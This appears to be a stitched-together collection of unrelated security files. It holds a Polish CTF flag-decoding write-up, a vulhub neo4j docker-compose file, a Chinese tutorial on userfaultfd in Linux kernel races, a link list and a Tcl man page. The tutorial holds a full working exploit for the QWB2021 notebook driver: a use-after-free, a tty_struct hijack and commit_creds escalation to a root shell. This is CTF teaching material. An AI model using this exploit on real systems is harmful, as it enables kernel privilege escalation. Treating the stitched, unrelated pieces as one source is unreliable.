KEK! TOP! KEK! TOP!!!!! KEK! TOP!! KEK! TOP! KEK!!!!! TOP!! KEK! TOP! KEK!!! TOP! KEK! TOP! KEK! TOP!! KEK!!! TOP!! KEK!!! TOP! KEK! TOP!! KEK! TOP!!! KEK!! TOP! KEK!!! TOP!!! KEK! TOP! KEK! TOP!!!!! KEK! TOP! KEK!!! TOP!! KEK!! TOP!!! KEK! TOP! KEK! TOP! KEK! TOP! KEK!! TOP!!! KEK!! TOP! KEK! TOP!!!!! KEK! TOP!!! KEK!! TOP! KEK!!! TOP!! KEK!!! TOP! KEK! TOP!! KEK!! TOP!!! KEK! TOP! KEK!! TOP! KEK!!!! TOP!!! KEK! TOP! KEK!!! TOP! KEK! TOP!!!!! KEK! TOP!! KEK! TOP!!! KEK!!! TOP!! KEK!!!!! TOP! KEK! TOP! KEK! TOP!!! KEK! TOP! KEK! TOP!!!!! KEK!! TOP!! KEK! TOP! KEK!!! TOP! KEK! TOP! KEK!! TOP! KEK!!! TOP!! KEK!! TOP!! KEK! TOP! KEK! TOP!!!!! KEK! TOP!!!! KEK!! TOP! KEK!! TOP!! KEK!!!!! TOP!!! KEK! TOP! KEK! TOP! KEK! TOP! KEK! TOP!!!!! KEK! TOP!! KEK! TOP! KEK!!!!! TOP!! KEK! TOP! KEK!!! TOP!!! KEK! TOP!! KEK!!! TOP!! KEK!!! TOP! KEK! TOP!! KEK! TOP!!! KEK!! TOP!! KEK!! TOP!!! KEK! TOP! KEK! TOP!!!!! KEK! TOP!! KEK!! TOP!! KEK!! TOP!!! KEK! TOP! KEK! TOP! KEK! TOP!! KEK! TOP!!! KEK!! TOP! KEK! TOP!!!!! KEK! TOP! KEK! TOP!!!!! KEK! TOP! KEK! TOP!!!!! KEK! TOP! KEK! TOP!!!!! KEK! TOP! KEK! TOP!!!!! KEK! TOP! KEK! TOP!!!!! KEK! TOP! KEK!! TOP! KEK! TOP!! KEK!! TOP!! KEK!! TOP!! KEK! TOP! KEK!! TOP! KEK! TOP!! KEK!! TOP! KEK!!!! TOP! KEK!! TOP! KEK!!!! TOP! KEK!! TOP! KEK!!!! TOP! KEK! TOP!!!!! KEK! TOP! ``` Początkowo myśleliśmy że to jakiś ezoteryczny język programowania podobny do Ook! ale potem doszliśmy do wniosku, że musi być jeszcze prościej - mamy w końcu tylko naprzemienne `TOP` i `KEK` oraz `!` za każdym z nich. Po pewnym czasie zgadliśmy wreszcie, że to może być po prostu kod binarny gdzie `TOP` lub `KEK` określają 0/1 a `!` oznacza powtórzenia. Napisaliśmy prosty skrypt: ```python import codecs with codecs.open("data.txt") as input_file: data = input_file.read() result = "" for entry in data.split(" "): repeat = len(entry) - 3 if entry[0] == "T": result += "1" * repeat else: result += "0" * repeat print(result) chunked = [result[i:i + 8] for i in range(0, len(result) - 7, 8)] print(chunked) converted = [chr(int(c, 2)) for c in chunked] print("".join(converted)) ``` Który dał nam flagę: `flag{T0o0o0o0o0P______1m_h4V1nG_FuN_r1gHt_n0W_4R3_y0u_h4v1ng_fun______K3K!!!}`
sec-knowleage
version: '3' services: web: image: vulhub/neo4j:3.4.18 ports: - "7474:7474" - "7687:7687" - "1337:1337" - "34444:34444" environment: NEO4J_AUTH: "neo4j/vulhub" JAVA_OPTS: "-Djava.rmi.server.hostname=${TARGET_IP:-127.0.0.1}"
sec-knowleage
# userfaultfd 的使用 ## 概述 严格意义而言 userfaultfd 并非是一种利用手法,**而是 Linux 的一个系统调用**,简单来说,通过 userfaultfd 这种机制,**用户可以通过自定义的 page fault handler 在用户态处理缺页异常**。 下面的这张图很好地体现了 userfaultfd 的整个流程: 要使用 userfaultfd 系统调用,我们首先要注册一个 userfaultfd,通过 ioctl 监视一块内存区域,同时还需要专门启动一个用以进行轮询的线程 `uffd monitor`,该线程会通过 `poll()` 函数不断轮询**直到出现缺页异常** - 当有一个线程在这块内存区域内触发缺页异常时(比如说第一次访问一个匿名页),该线程(称之为 faulting 线程)进入到内核中处理缺页异常 - 内核会调用 `handle_userfault()` 交由 userfaultfd 处理 - 随后 faulting 线程进入堵塞状态,同时将一个 `uffd_msg` 发送给 monitor 线程,等待其处理结束 - monitor 线程调用通过 ioctl 处理缺页异常,有如下选项: - `UFFDIO_COPY`:将用户自定义数据拷贝到 faulting page 上 - `UFFDIO_ZEROPAGE` :将 faulting page 置 0 - `UFFDIO_WAKE`:用于配合上面两项中 `UFFDIO_COPY_MODE_DONTWAKE` 和 `UFFDIO_ZEROPAGE_MODE_DONTWAKE` 模式实现批量填充 - 在处理结束后 monitor 线程发送信号唤醒 faulting 线程继续工作 以上便是 userfaultfd 这个机制的整个流程,该机制最初被设计来用以进行虚拟机/进程的迁移等用途,但是**通过这个机制我们可以控制进程执行流程的先后顺序,从而使得对条件竞争的利用成功率大幅提高**,比如在如下的操作时: ```c copy_from_user(kptr, user_buf, size); ``` 如果在进入函数后,实际拷贝开始前线程被中断换下 CPU,别的线程执行,修改了 kptr 指向的内存块的所有权(比如 kfree 掉了这个内存块),然后再执行拷贝时就可以实现 UAF。这种可能性当然是比较小的,但是如果 user_buf 是一个 mmap 的内存块,并且我们为它注册了 userfaultfd,那么在拷贝时出现缺页异常后此线程会先执行我们注册的处理函数,在处理函数结束前线程一直被暂停,结束后才会执行后面的操作,大大增加了竞争的成功率。 ## 使用方法 在 [Linux man page](https://man7.org/linux/man-pages/man2/userfaultfd.2.html) 当中便已经为我们提供了 userfaultfd 的基本使用模板,我们只需要稍加修改便能直接投入到实战当中,下面笔者给出自用的为特定内存注册 userfaultfd monitor 的模板: ```c void err_exit(char *msg) { printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg); exit(EXIT_FAILURE); } void register_userfaultfd(pthread_t *monitor_thread, void *addr, unsigned long len, void *(*handler)(void*)) { long uffd; struct uffdio_api uffdio_api; struct uffdio_register uffdio_register; int s; /* Create and enable userfaultfd object */ uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK); if (uffd == -1) err_exit("userfaultfd"); uffdio_api.api = UFFD_API; uffdio_api.features = 0; if (ioctl(uffd, UFFDIO_API, &uffdio_api) == -1) err_exit("ioctl-UFFDIO_API"); uffdio_register.range.start = (unsigned long) addr; uffdio_register.range.len = len; uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING; if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1) err_exit("ioctl-UFFDIO_REGISTER"); s = pthread_create(monitor_thread, NULL, handler, (void *) uffd); if (s != 0) err_exit("pthread_create"); } ``` 我们可以直接通过如下操作来为一块匿名的 mmap 内存注册 userfaultfd: ```c register_userfaultfd(thread, addr, len, handler); ``` 需要注意的是 handler 的写法,这里笔者直接照抄 Linux man page 改了改,可以根据个人需求进行个性化改动: ```c static char *uffd_src_page = NULL; // 你要拷贝进去的数据 static long uffd_src_page_size = 0x1000; static void * fault_handler_thread(void *arg) { static struct uffd_msg msg; static int fault_cnt = 0; long uffd; struct uffdio_copy uffdio_copy; ssize_t nread; uffd = (long) arg; for (;;) { struct pollfd pollfd; int nready; pollfd.fd = uffd; pollfd.events = POLLIN; nready = poll(&pollfd, 1, -1); /* * [在这停顿.jpg] * 当 poll 返回时说明出现了缺页异常 * 你可以在这里插入一些比如说 sleep() 一类的操作, * 例如等待其他进程完成对象的重分配后再重新进行拷贝一类的,也可以直接睡死 :) */ if (nready == -1) errExit("poll"); nread = read(uffd, &msg, sizeof(msg)); if (nread == 0) errExit("EOF on userfaultfd!\n"); if (nread == -1) errExit("read"); if (msg.event != UFFD_EVENT_PAGEFAULT) errExit("Unexpected event on userfaultfd\n"); uffdio_copy.src = (unsigned long) uffd_src_page; uffdio_copy.dst = (unsigned long) msg.arg.pagefault.address & ~(uffd_src_page_size - 1); uffdio_copy.len = page_size; uffdio_copy.mode = 0; uffdio_copy.copy = 0; if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1) errExit("ioctl-UFFDIO_COPY"); } } ``` ## 例题:QWB2021-notebook 这里以强网杯 2021 的 notebook 一题为例解释 userfaultfd 在条件竞争中的使用 ### 分析 首先看一下启动脚本 ```shell #!/bin/sh stty intr ^] qemu-system-x86_64 \ -m 64M \ -kernel bzImage \ -initrd rootfs.cpio \ -append "loglevel=3 console=ttyS0 oops=panic panic=1 kaslr" \ -nographic -net user -net nic -device e1000 \ -smp cores=2,threads=2 -cpu kvm64,+smep,+smap \ -monitor /dev/null 2>/dev/null -s ``` append 时把 loglevel 开到了 3,建议把这个去掉,调试起来会好判断一点(可以看到驱动 printk 的内容)。 程序的流程比较简单,也没有去符号,这里就不分析了。程序主要的漏洞就是条件竞争造成的 UAF。 首先先说一下读写锁,其性质为 * 当写锁被取走时,所有取锁操作被阻塞 * 当读锁被取走时,取写锁的操作被阻塞 恰当的使用读写锁可以在提高程序性能的前提下保证线程同步。题目中的驱动程序在 noteedit 和 noteadd 操作中取了读锁,仅在 notedel 操作中取了写锁。其余操作都没有锁保护。而两个取读锁的操作实际上都有写操作,但是他们又是可以并发的,这样就很可能存在条件竞争的漏洞。 这是 noteedit 操作的部分代码,这里的 krealloc 并未对 newsize 做任何限制。同时并没有及时更新 note 指针,反而在更新前加入了 copy_from_user 的操作,那么就可以考虑通过 userfaultfd 操作卡死当前线程,避免 note 的更新,这样就可以保留一个被 kfree 的 slab 的指针。这样操作的问题是 note 的 size 被更新为了 0,之后 read 和 write 操作就无法读写数据了。 不过在 add 操作时,也类似的在更新 size 前加入了 copy_from_user 的操作,我们也可以把线程卡死在这里,把 size 改为 0x60。 因此,我们可以做到 * 申请任意大小的 slab。虽然 add 操作限制了 size 最大为 0x60,但是通过 edit 可以 krealloc 出任意大小的 slab * UAF 任意大小的 slab。不过只能控制前 0x60 字节的数据 ### 利用 由于 edit 函数中使用了 `copy_from_user()`,这为 userfaultfd 的介入提供了可能性,我们可以: - 分配一个特定大小的 note - 新开 edit 线程通过 `krealloc(0)` 将其释放**,并通过 userfaultfd 卡在这里** **此时 notebook 数组中的 object 尚未被清空,仍是原先被释放了的 object,我们只需要再将其分配到别的内核结构体上便能完成 UAF** 这里我们还是选择最经典的 `tty_struct` 来完成利用,由于题目提供了读取堆块的功能,故我们可以直接通过 `tty_struct` 中的 `tty_operations` 泄露内核基地址,其通常被初始化为**全局变量** `ptm_unix98_ops` 或 `pty_unix98_ops ` 开启了 kaslr 的内核在内存中的偏移依然以内存页为粒度,故我们可以通过比对 tty\_operations 地址的低三16进制位来判断是 `ptm_unix98_ops` 还是 `pty_unix98_ops ` 由于题目提供了写入堆块的功能,故我们可以直接通过修改 `tty_struct->tty_operations` 后操作 tty(例如read、write、ioctl...这会调用到函数表中的对应函数指针)的方式劫持内核执行流,同时 `notegift()` 会白给出 notebook 里存的 object 的地址,那么我们可以直接把 `fake tty_operations` 布置到 note 当中。 不过相比于传统的构造冗长的栈迁移的 ROP chain,长亭在 WP 中提到了一个很有趣的 trick,[原文链接](https://zhuanlan.zhihu.com/p/385645268)。这里引用原文 > 控制 rip 之后,下一步就是绕过 SMEP 和 SMAP 了,这里介绍一种在完全控制了 tty 对象的情况下非常好用的 trick,完全不用 ROP,非常简单,且非常稳定(我们的 exploit 在利用成功和可以正常退出程序,甚至关机都不会触发 kernel panic)。 > > 内核中有这样的一个函数: > > > > 其编译后大概长这样: > > > > 该函数位于 workqueue 机制的实现中,只要是开启了多核支持的内核 (CONFIG_SMP)都会包含这个函数的代码。不难注意到,这个函数非常好用,只要能控制第一个参数指向的内存,即可实现带一个任意参数调用任意函数,并把返回值存回第一个参数指向的内存的功能,且该 "gadget" 能干净的返回,执行的过程中完全不用管 SMAP、SMEP 的事情。由于内核中大量的 read / write / ioctl 之类的实现的第一个参数也都恰好是对应的对象本身,可谓是非常的适合这种场景了。考虑到我们提权需要做的事情只是 commit_creds(prepare_kernel_cred(0)),完全可以用两次上述的函数调用原语实现。(如果还需要禁用 SELinux 之类的,再找一个任意地址写 0 的 gadget 即可,很容易找) 利用这个原语就可以比较容易的任意函数执行了。 在利用过程当中我们还需要注意两点: - 由于题目环境存在多个 CPU core,因此我们应当使用 `sched_setaffinity()` 将进程绑定到指定核心上,从而确保内核对象分配的稳定性,而无需进行堆喷射 - `tty_struct` 的结构也被我们所破坏了,在完成提权之后我们应该将其内容恢复原样 ### exp 最后进行稳定化提权的 exp 如下,其中 `kernelpwn.h` 来自于[这里](https://arttnba3.cn/download/kernelpwn.h): ```c #define _GNU_SOURCE #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <fcntl.h> #include <string.h> #include <pthread.h> #include <sys/types.h> #include <linux/userfaultfd.h> #include <sys/mman.h> #include <sys/syscall.h> #include <sys/ioctl.h> #include <sys/sem.h> #include <semaphore.h> #include <poll.h> #include "kernelpwn.h" #define TTY_STRUCT_SIZE 0x2e0 #define PTM_UNIX98_OPS 0xffffffff81e8e440 #define PTY_UNIX98_OPS 0xffffffff81e8e320 #define COMMIT_CREDS 0xffffffff810a9b40 #define PREPARE_KERNEL_CRED 0xffffffff810a9ef0 #define WORK_FOR_CPU_FN 0xffffffff8109eb90 #define NOTE_NUM 0x10 struct Note { size_t idx; size_t size; char * buf; }; struct KernelNotebook { void *ptr; size_t size; }; int note_fd; sem_t evil_add_sem, evil_edit_sem; char *uffd_buf; char temp_page[0x1000] = { "arttnba3" }; void noteAdd(size_t idx, size_t size, char * buf) { struct Note note = { .idx = idx, .size = size, .buf = buf, }; ioctl(note_fd, 0x100, &note); } void noteDel(size_t idx) { struct Note note = { .idx = idx, }; ioctl(note_fd, 0x200, &note); } void noteEdit(size_t idx, size_t size, char * buf) { struct Note note = { .idx = idx, .size = size, .buf = buf, }; ioctl(note_fd, 0x300, &note); } void noteGift(void *buf) { struct Note note = { .buf = buf, }; ioctl(note_fd, 100, &note); } ssize_t noteRead(int idx, void *buf) { return read(note_fd, buf, idx); } ssize_t noteWrite(int idx, void *buf) { return write(note_fd, buf, idx); } void* fixSizeByAdd(void *args) { sem_wait(&evil_add_sem); noteAdd(0, 0x60, uffd_buf); } void* constructUAF(void * args) { sem_wait(&evil_edit_sem); noteEdit(0, 0, uffd_buf); } int main(int argc, char **argv, char **envp) { struct KernelNotebook kernel_notebook[NOTE_NUM]; struct tty_operations fake_tty_ops; pthread_t uffd_monitor_thread, add_fix_size_thread, edit_uaf_thread; size_t fake_tty_struct_data[0x100], tty_ops, orig_tty_struct_data[0x100]; size_t tty_struct_addr, fake_tty_ops_addr; int tty_fd; /* fundamental infastructure */ saveStatus(); bindCore(0); sem_init(&evil_add_sem, 0, 0); sem_init(&evil_edit_sem, 0, 0); /* open dev */ note_fd = open("/dev/notebook", O_RDWR); if (note_fd < 0) { errExit("failed to open /dev/notebook!"); } /* register userfaultfd */ puts("[*] register userfaultfd..."); uffd_buf = (char *) mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); registerUserFaultFdForThreadStucking(&uffd_monitor_thread, uffd_buf,0x1000); /* get a tty-size object */ puts("[*] allocating tty_struct-size object..."); noteAdd(0, 0x10, "arttnba3rat3bant"); noteEdit(0, TTY_STRUCT_SIZE, temp_page); /** * construct UAF by userfaultfd. * Note that we need to sleep(1) there to wait for the kfree() to be done, * so that the UAF object can be regetted later. */ puts("[*] constructing UAF on tty_struct..."); pthread_create(&edit_uaf_thread, NULL, constructUAF, NULL); pthread_create(&add_fix_size_thread, NULL, fixSizeByAdd, NULL); sem_post(&evil_edit_sem); sleep(1); /** * fix notebook[0]->size. * Note that we need to sleep(1) there to wait for the `size` to be fixed. */ sem_post(&evil_add_sem); sleep(1); /* leak kernel_base by tty_struct */ puts("[*] leaking kernel_base by tty_struct"); tty_fd = open("/dev/ptmx", O_RDWR| O_NOCTTY); noteRead(0, orig_tty_struct_data); if (*(int*) orig_tty_struct_data != 0x5401) { errExit("failed to hit the tty_struct!"); } tty_ops = orig_tty_struct_data[3]; kernel_offset = ((tty_ops & 0xfff) == (PTY_UNIX98_OPS & 0xfff) ? (tty_ops - PTY_UNIX98_OPS) : tty_ops - PTM_UNIX98_OPS); kernel_base += kernel_offset; printf("\033[34m\033[1m[*] Kernel offset: \033[0m0x%lx\n", kernel_offset); printf("\033[32m\033[1m[+] Kernel base: \033[0m0x%lx\n", kernel_base); /* construct fake tty_ops */ puts("[*] construct fake tty_operations..."); fake_tty_ops.ioctl = kernel_offset + WORK_FOR_CPU_FN; noteAdd(1, 0x50, temp_page); noteEdit(1, sizeof(struct tty_operations), temp_page); noteWrite(1, &fake_tty_ops); /* get kernel addr of tty_struct and tty_ops by gift */ puts("[*] leaking kernel heap addr by gift..."); noteGift(&kernel_notebook); tty_struct_addr = kernel_notebook[0].ptr; fake_tty_ops_addr = kernel_notebook[1].ptr; printf("[+] tty_struct at 0x%lx\n", tty_struct_addr); printf("[+] fake_tty_ops at 0x%lx\n", fake_tty_ops_addr); /* prepare_kernel_cred(NULL) */ puts("[*] triger commit_creds(prepare_kernel_cred(NULL)) and fix tty..."); memcpy(fake_tty_struct_data, orig_tty_struct_data, 0x2e0); fake_tty_struct_data[3] = fake_tty_ops_addr; fake_tty_struct_data[4] = kernel_offset + PREPARE_KERNEL_CRED; fake_tty_struct_data[5] = NULL; noteWrite(0, fake_tty_struct_data); ioctl(tty_fd, 233, 233); /* commit_creds(&root_cred) */ noteRead(0, fake_tty_struct_data); fake_tty_struct_data[4] = kernel_offset + COMMIT_CREDS; fake_tty_struct_data[5] = fake_tty_struct_data[6]; fake_tty_struct_data[6] = orig_tty_struct_data[6]; noteWrite(0, fake_tty_struct_data); ioctl(tty_fd, 233, 233); /* fix tty_struct */ memcpy(fake_tty_struct_data, orig_tty_struct_data, 0x2e0); noteWrite(0, fake_tty_struct_data); /* pop root shell */ getRootShell(); return 0; } ``` ## 新版本内核对抗 userfaultfd 在 race condition 中的利用 正所谓“没有万能的银弹”,可能有的人会发现在较新版本的内核中 userfaultfd 系统调用无法成功启动: 这是因为在较新版本的内核中修改了变量 `sysctl_unprivileged_userfaultfd` 的值: > 来自 linux-5.11 源码`fs/userfaultfd.c`: ```c int sysctl_unprivileged_userfaultfd __read_mostly; //... SYSCALL_DEFINE1(userfaultfd, int, flags) { struct userfaultfd_ctx *ctx; int fd; if (!sysctl_unprivileged_userfaultfd && (flags & UFFD_USER_MODE_ONLY) == 0 && !capable(CAP_SYS_PTRACE)) { printk_once(KERN_WARNING "uffd: Set unprivileged_userfaultfd " "sysctl knob to 1 if kernel faults must be handled " "without obtaining CAP_SYS_PTRACE capability\n"); return -EPERM; } //... ``` > 来自 linux-5.4 源码`fs/userfaultfd.c`: ```c int sysctl_unprivileged_userfaultfd __read_mostly = 1; //... ``` 在之前的版本当中 `sysctl_unprivileged_userfaultfd` 这一变量被初始化为 `1`,而在较新版本的内核当中这一变量并没有被赋予初始值,**编译器会将其放在 bss 段,默认值为 0** 这意味着在较新版本内核中**只有 root 权限才能使用 userfaultfd**,这或许意味着刚刚进入大众视野的 userfaultfd 可能又将逐渐淡出大众视野,但不可否认的是,userfaultfd 确乎为我们在 Linux kernel 中的条件竞争利用提供了一个全新的思路与一种极其稳定的利用手法 ## Reference > [【PWN.0x00】Linux Kernel Pwn I:Basic Exploit to Kernel Pwn in CTF](https://arttnba3.cn/2021/03/03/PWN-0X00-LINUX-KERNEL-PWN-PART-I/) > > [linux kernel pwn学习之条件竞争(二)userfaultfd](https://blog.csdn.net/seaaseesa/article/details/104650794?utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7EBlogCommendFromBaidu%7Edefault-6.control&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2%7Edefault%7EBlogCommendFromBaidu%7Edefault-6.control) > > [https://zhuanlan.zhihu.com/p/385645268](https://zhuanlan.zhihu.com/p/385645268) > > [https://www.cjovi.icu/WP/1455.html](https://www.cjovi.icu/WP/1455.html) > > [https://www.cjovi.icu/WP/1468.html](https://www.cjovi.icu/WP/1468.html) > > [从内核到用户空间(1) — 用户态缺页处理机制 userfaultfd 的使用](http://blog.jcix.top/2018-10-01/userfaultfd_intro/)
sec-knowleage
# 学习资源 ## 在线学习 - [i 春秋-专业的网络安全|信息安全在线学习培训平台](http://www.ichunqiu.com) - [看雪知识库](https://www.kanxue.com/chm.htm) - [CTFHub](https://www.ctfhub.com/) ## 学习路线 - [知道创宇研发技能表 v3.1](http://blog.knownsec.com/Knownsec_RD_Checklist/index.html) - [漏洞银行(BUGBANK)技能树 ](https://skills.bugbank.cn/) - [安全技能树简版 by 余弦](http://evilcos.me/security_skill_tree_basic/index.html) - [安全类思维导图 by phith0n](https://github.com/phith0n/Mind-Map) - [信息安全从业者书单推荐](https://github.com/riusksk/secbook) - [CTFHub 技能树](https://www.ctfhub.com/#/skilltree) ## 信息资讯 - [FreeBuf.COM | 关注黑客与极客](http://www.freebuf.com/) - [安全客 - 有思想的安全新媒体](https://www.anquanke.com/) - [嘶吼 RoarTalk – 回归最本质的信息安全](http://www.4hou.com/) - [Sec-News 安全文摘](https://wiki.ioin.in/) ## 技术论坛 - [吾爱破解](http://www.52pojie.cn) - [看雪论坛](http://bbs.pediy.com/) - [先知社区](https://xz.aliyun.com/) - [i春秋论坛](https://bbs.ichunqiu.com/) ## CTF 赛事 - [XCTF社区](https://www.xctf.org.cn/) - [CTFtime](https://ctftime.org/) - [CTFHub 赛事中心](https://www.ctfhub.com/#/calendar) ## CTF OJ - [XCTF OJ](http://oj.xctf.org.cn) - [CTF大本营](https://www.ichunqiu.com/competition) - [pwnhub](https://pwnhub.cn/index) - [南邮网络攻防训练平台](https://ctf.njupt.edu.cn/) - [HackingLab 网络信息安全攻防学习平台](http://hackinglab.cn/) - [BugkuCTF](http://ctf.bugku.com/) - [WeChall](https://www.wechall.net/) - [Sniper OJ](http://www.sniperoj.com/) - [Jarvis OJ](https://www.jarvisoj.com/) - [CTF Learn](https://ctflearn.com/) - [Hackme CTF](https://hackme.inndy.tw/scoreboard/) - [Practice CTF List](http://captf.com/practice-ctf/) - [CTFHub 真题复现](https://www.ctfhub.com/#/challenge) ## CTF 工具 - [看雪工具](https://tools.pediy.com/) - [吾爱破解工具](https://down.52pojie.cn/Tools/) - [CTF在线工具 by CTFcode](http://ctf.ssleye.com/) - [CTF在线工具箱 by bugku](http://tool.bugku.com/) - [CTF工具资源库 by HBCTF team](https://ctftools.com/down/) - [ctf-tools by zardus](https://github.com/zardus/ctf-tools) - [The Cyber Swiss Army Knife](https://gchq.github.io/CyberChef/) - [CTFHub 工具库](https://www.ctfhub.com/#/tools) ## CTF Writeup 集合 - [CTFs Writeup 集锦](https://github.com/ctfs) - [CTF solution by p4 team](https://github.com/p4-team/ctf) - [CTFHub Writeup](https://writeup.ctfhub.com/) ## 资源聚合 - [渗透师导航](https://www.shentoushi.top/) - [安全圈](https://www.anquanquan.info/) - [纳威安全导航](https://navisec.it/) - [XssSafe导航](https://www.xssav.com/) - [Coco413 Blog](https://www.coco413.com/navi.html) - [安全导航(镜像)](http://web.archive.org/web/20220327073119/https://www.milw0rm.cn/nav/) - [SecWeb(镜像)](http://web.archive.org/web/20200912174524/https://thief.one/SecWeb/)
sec-knowleage
'\" '\" Copyright (c) 1993 The Regents of the University of California. '\" Copyright (c) 1994-1997 Sun Microsystems, Inc. '\" '\" See the file "license.terms" for information on usage and redistribution '\" of this file, and for a DISCLAIMER OF ALL WARRANTIES. '\" '\" RCS: @(#) $Id: rename.n,v 1.2 2003/11/24 05:09:59 bbbush Exp $ '\" '\" The definitions below are for supplemental macros used in Tcl/Tk '\" manual entries. '\" '\" .AP type name in/out ?indent? '\" Start paragraph describing an argument to a library procedure. '\" type is type of argument (int, etc.), in/out is either "in", "out", '\" or "in/out" to describe whether procedure reads or modifies arg, '\" and indent is equivalent to second arg of .IP (shouldn't ever be '\" needed; use .AS below instead) '\" '\" .AS ?type? ?name? '\" Give maximum sizes of arguments for setting tab stops. Type and '\" name are examples of largest possible arguments that will be passed '\" to .AP later. If args are omitted, default tab stops are used. '\" '\" .BS '\" Start box enclosure. From here until next .BE, everything will be '\" enclosed in one large box. '\" '\" .BE '\" End of box enclosure. '\" '\" .CS '\" Begin code excerpt. '\" '\" .CE '\" End code excerpt. '\" '\" .VS ?version? ?br? '\" Begin vertical sidebar, for use in marking newly-changed parts '\" of man pages. The first argument is ignored and used for recording '\" the version when the .VS was added, so that the sidebars can be '\" found and removed when they reach a certain age. If another argument '\" is present, then a line break is forced before starting the sidebar. '\" '\" .VE '\" End of vertical sidebar. '\" '\" .DS '\" Begin an indented unfilled display. '\" '\" .DE '\" End of indented unfilled display. '\" '\" .SO '\" Start of list of standard options for a Tk widget. The '\" options follow on successive lines, in four columns separated '\" by tabs. '\" '\" .SE '\" End of list of standard options for a Tk widget. '\" '\" .OP cmdName dbName dbClass '\" Start of description of a specific option. cmdName gives the '\" option's name as specified in the class command, dbName gives '\" the option's name in the option database, and dbClass gives '\" the option's class in the option database. '\" '\" .UL arg1 arg2 '\" Print arg1 underlined, then print arg2 normally. '\" '\" RCS: @(#) $Id: rename.n,v 1.2 2003/11/24 05:09:59 bbbush Exp $ '\" '\" # Set up traps and other miscellaneous stuff for Tcl/Tk man pages. .if t .wh -1.3i ^B .nr ^l \n(.l .ad b '\" # Start an argument description .de AP .ie !"\\$4"" .TP \\$4 .el \{\ . ie !"\\$2"" .TP \\n()Cu . el .TP 15 .\} .ta \\n()Au \\n()Bu .ie !"\\$3"" \{\ \&\\$1 \\fI\\$2\\fP (\\$3) .\".b .\} .el \{\ .br .ie !"\\$2"" \{\ \&\\$1 \\fI\\$2\\fP .\} .el \{\ \&\\fI\\$1\\fP .\} .\} .. '\" # define tabbing values for .AP .de AS .nr )A 10n .if !"\\$1"" .nr )A \\w'\\$1'u+3n .nr )B \\n()Au+15n .\" .if !"\\$2"" .nr )B \\w'\\$2'u+\\n()Au+3n .nr )C \\n()Bu+\\w'(in/out)'u+2n .. .AS Tcl_Interp Tcl_CreateInterp in/out '\" # BS - start boxed text '\" # ^y = starting y location '\" # ^b = 1 .de BS .br .mk ^y .nr ^b 1u .if n .nf .if n .ti 0 .if n \l'\\n(.lu\(ul' .if n .fi .. '\" # BE - end boxed text (draw box now) .de BE .nf .ti 0 .mk ^t .ie n \l'\\n(^lu\(ul' .el \{\ .\" Draw four-sided box normally, but don't draw top of .\" box if the box started on an earlier page. .ie !\\n(^b-1 \{\ \h'-1.5n'\L'|\\n(^yu-1v'\l'\\n(^lu+3n\(ul'\L'\\n(^tu+1v-\\n(^yu'\l'|0u-1.5n\(ul' .\} .el \}\ \h'-1.5n'\L'|\\n(^yu-1v'\h'\\n(^lu+3n'\L'\\n(^tu+1v-\\n(^yu'\l'|0u-1.5n\(ul' .\} .\} .fi .br .nr ^b 0 .. '\" # VS - start vertical sidebar '\" # ^Y = starting y location '\" # ^v = 1 (for troff; for nroff this doesn't matter) .de VS .if !"\\$2"" .br .mk ^Y .ie n 'mc \s12\(br\s0 .el .nr ^v 1u .. '\" # VE - end of vertical sidebar .de VE .ie n 'mc .el \{\ .ev 2 .nf .ti 0 .mk ^t \h'|\\n(^lu+3n'\L'|\\n(^Yu-1v\(bv'\v'\\n(^tu+1v-\\n(^Yu'\h'-|\\n(^lu+3n' .sp -1 .fi .ev .\} .nr ^v 0 .. '\" # Special macro to handle page bottom: finish off current '\" # box/sidebar if in box/sidebar mode, then invoked standard '\" # page bottom macro. .de ^B .ev 2 'ti 0 'nf .mk ^t .if \\n(^b \{\ .\" Draw three-sided box if this is the box's first page, .\" draw two sides but no top otherwise. .ie !\\n(^b-1 \h'-1.5n'\L'|\\n(^yu-1v'\l'\\n(^lu+3n\(ul'\L'\\n(^tu+1v-\\n(^yu'\h'|0u'\c .el \h'-1.5n'\L'|\\n(^yu-1v'\h'\\n(^lu+3n'\L'\\n(^tu+1v-\\n(^yu'\h'|0u'\c .\} .if \\n(^v \{\ .nr ^x \\n(^tu+1v-\\n(^Yu \kx\h'-\\nxu'\h'|\\n(^lu+3n'\ky\L'-\\n(^xu'\v'\\n(^xu'\h'|0u'\c .\} .bp 'fi .ev .if \\n(^b \{\ .mk ^y .nr ^b 2 .\} .if \\n(^v \{\ .mk ^Y .\} .. '\" # DS - begin display .de DS .RS .nf .sp .. '\" # DE - end display .de DE .fi .RE .sp .. '\" # SO - start of list of standard options .de SO .SH "STANDARD OPTIONS" .LP .nf .ta 5.5c 11c .ft B .. '\" # SE - end of list of standard options .de SE .fi .ft R .LP See the \\fBoptions\\fR manual entry for details on the standard options. .. '\" # OP - start of full description for a single option .de OP .LP .nf .ta 4c Command-Line Name: \\fB\\$1\\fR Database Name: \\fB\\$2\\fR Database Class: \\fB\\$3\\fR .fi .IP .. '\" # CS - begin code excerpt .de CS .RS .nf .ta .25i .5i .75i 1i .. '\" # CE - end code excerpt .de CE .fi .RE .. .de UL \\$1\l'|0\(ul'\\$2 .. .TH rename 3tcl "" Tcl "Tcl Built-In Commands" .BS '\" Note: do not modify the .SH NAME line immediately below! .SH NAME rename \- 重命名或删除一个命令 .SH "总览 SYNOPSIS" \fBrename \fIoldName newName\fR .BE .SH "描述 DESCRIPTION" .PP 把过去叫做 \fIoldName\fR 的命令重命名为叫做 \fInewName\fR。如果 \fInewName\fR 是一个空串则删除叫做 \fIoldName \fR的命令。\fIoldName\fR 和 \fInewName\fR 可以包括名字空间限定符(包含名字空间的名字)。如果一个命令被重命名到一个不同名字空间中,将来对它的调用将在新的名字空间中执行。\fBrename\fR 命令返回一个空串作为结果。 .SH "参见 SEE ALSO" namespace(n), proc(n) .SH "关键字 KEYWORDS" command, delete, namespace, rename .SH "[中文版维护人]" .B 寒蝉退士 .SH "[中文版最新更新]" .B 2001/10/28 .SH "《中国 Linux 论坛 man 手册页翻译计划》:" .BI 